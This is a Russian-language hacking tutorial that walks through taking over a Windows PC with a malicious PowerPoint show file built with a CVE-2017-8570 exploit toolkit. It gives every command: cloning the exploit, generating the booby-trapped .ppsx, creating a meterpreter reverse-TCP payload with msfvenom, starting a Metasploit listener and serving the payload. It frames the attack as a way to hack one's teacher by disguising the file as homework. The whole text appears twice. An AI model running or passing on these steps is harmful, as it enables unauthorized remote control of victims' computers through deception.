Взлом ПК через презентацию
Сегодня мы сможем взломать комп без "exe" файла.
Небольшая история
Допустим вам нужно хэкнуть своего учителя, и подсунуть ему exe-шник сложновато. И тут на помощь приходит Kali Linux с новым обновлением(обновой metasploit), мы создаем файл похожий на презентацию(Пример: дз.ppsx). И его он с удовольствием откроет.
Что нам понадобиться:
1) Kali linux
2) Metasploit
3) Знания базовых команд линукс
Начинаем:
1) Для начала нужно скачать сам эксплоит
git clone GitHub - tezukanice/Office8570: CVE20178570
2) Переходим в скачаную папку
cd Office8570
3) Для успешной генерации ppsx файла, нужно создать папку " template " в директории Office8570
mkdir template
и в нее перенести файл template.ppsx ( он находиться в папке которую мы скачали )
template.ppsx template/
4) Половина пути пройдена!!
Далее нужно создать сам .ppsx файл ⤋⤋⤋( имя презентации меняется здесь )
python cve-2017-8570toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc
5) Файл презентации мы сделали, но в него нужно вшить вирус(полезную нагрузку)
Создадим сам Payload (именно в директории /tmp/ это важно, крч просто не не меняйте команду)
msfvenom -p windows/meterpreter/reversetcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe
6) Запускаем слушатель. Он сообщает и получает управление когда жертва открыла файл
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reversetcp; set LHOST ВашАйпи; set LPORT 4444; run"
6) Вирус и слушатель готовы. Нужно запускать сам эксплоит-сервер
python cve-2017-8570toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe
Сегодня мы сможем взломать комп без "exe" файла.
Небольшая история
Допустим вам нужно хэкнуть своего учителя, и подсунуть ему exe-шник сложновато. И тут на помощь приходит Kali Linux с новым обновлением(обновой metasploit), мы создаем файл похожий на презентацию(Пример: дз.ppsx). И его он с удовольствием откроет.
Что нам понадобиться:
1) Kali linux
2) Metasploit
3) Знания базовых команд линукс
Начинаем:
1) Для начала нужно скачать сам эксплоит
git clone GitHub - tezukanice/Office8570: CVE20178570
2) Переходим в скачаную папку
cd Office8570
3) Для успешной генерации ppsx файла, нужно создать папку " template " в директории Office8570
mkdir template
и в нее перенести файл template.ppsx ( он находиться в папке которую мы скачали )
template.ppsx template/
4) Половина пути пройдена!!
Далее нужно создать сам .ppsx файл ⤋⤋⤋( имя презентации меняется здесь )
python cve-2017-8570toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc
5) Файл презентации мы сделали, но в него нужно вшить вирус(полезную нагрузку)
Создадим сам Payload (именно в директории /tmp/ это важно, крч просто не не меняйте команду)
msfvenom -p windows/meterpreter/reversetcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe
6) Запускаем слушатель. Он сообщает и получает управление когда жертва открыла файл
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reversetcp; set LHOST ВашАйпи; set LPORT 4444; run"
6) Вирус и слушатель готовы. Нужно запускать сам эксплоит-сервер
python cve-2017-8570toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe